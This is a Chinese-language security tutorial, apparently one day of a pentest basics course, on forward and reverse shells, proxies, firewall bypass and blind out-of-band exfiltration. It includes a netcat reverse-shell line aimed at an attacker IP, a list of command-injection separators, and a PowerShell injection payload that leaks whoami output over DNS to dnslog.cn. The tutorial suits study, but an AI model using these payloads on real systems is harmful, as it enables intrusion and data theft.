第5天:基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

img

img

正/反向shell

1
2
客户端-->发送shell-->服务端
服务端-->反馈客户端发送的指令-->客户端

反向shell:

1
2
3
客户端接收(监听)-->服务端进行发送数据-->回馈客户端

好处:一般的防火墙都是不允许外部连接内部,所以这个时候如果用服务器主动去访问外网,就可以绕过防火墙禁止外网连接内网的需求。但是有可能内网不可以出网,所以这个时候还可以尝试frp(内网穿透)

跟正反代理的区别

1
2
3
4
5
回顾一下正反代理的原理:

正向代理:客户端通过代理服务器,访问服务器端,这种是解决客户端访问不到服务端的需求,所以需要一台可以访问到目标服务器的代理服务器来进行正向代理。这种方式是:客户端-->代理服务器-->目标服务器,这种方式客户端的流量是可以正常访问到目标服务器的

反向代理:首先需求还是客户端和服务端互相不能进行访问,所以这时候需要一台两边都可以访问的代理服务器,这个时候,目标服务器将数据传输到代理服务器上,然后代理服务器就约等于目标服务器,所以客户端就可以访问代理服务器上的资源,来达到使用目标服务器上的业务。跟正向的区别就是,这里的客户端是访问不到真实的目标服务器,你所进行的攻击只是在代理服务器上进行。
维度 正向代理 反向代理
主动方 客户端主动使用代理 服务器端配置代理
隐藏对象 隐藏客户端身份 隐藏服务器身份
典型用途 突破访问限制、内容过滤 负载均衡、缓存、安全防护
维度 正向shell 反向shell
连接方向 攻击者 → 受害者 受害者 → 攻击者
依赖条件 受害者端口开放 攻击者端口可访问
典型工具 Netcat监听(nc -lvvp 80 Netcat连接(nc -e /bin/sh 攻击者IP 4444
适用场景 直连环境 防火墙/NAT环境
  • 正向代理:像“代购”(客户端委托代理购物)。
  • 反向代理:像“门卫”(外部只能看到门卫,不知内部结构)。
  • 正向shell:像“攻击者直接敲门”(需目标开门)。
  • 反向shell:像“目标主动寄出钥匙”(攻击者只需等待收件)。

实际案例 1:防火墙绕过-正向连接&反向连接&内网服务器

1
2
3
4
管道符:| (管道符号) ||(逻辑或) &&(逻辑与)  &(后台任务符号)

Windows->| & || &&
Linux->; | || & && ``(特有``和;)

出站入站都开启策略(数据不回显):osi网络七层

为什么要这样写:

cmd无法执行whoami,用到powershell变量赋值,把whoami执行结果给变量,结果带有’’导致ping无法执行

1
2
127.0.0.1 | powershell
$x=whoami;$x=$x.Replace('\','xxx');$y='.ydzaq1.dnslog.cn';$z=$x+$y;ping $z

image-20250503223320508

image-20250503223258616

linux的:

image-20250503210113770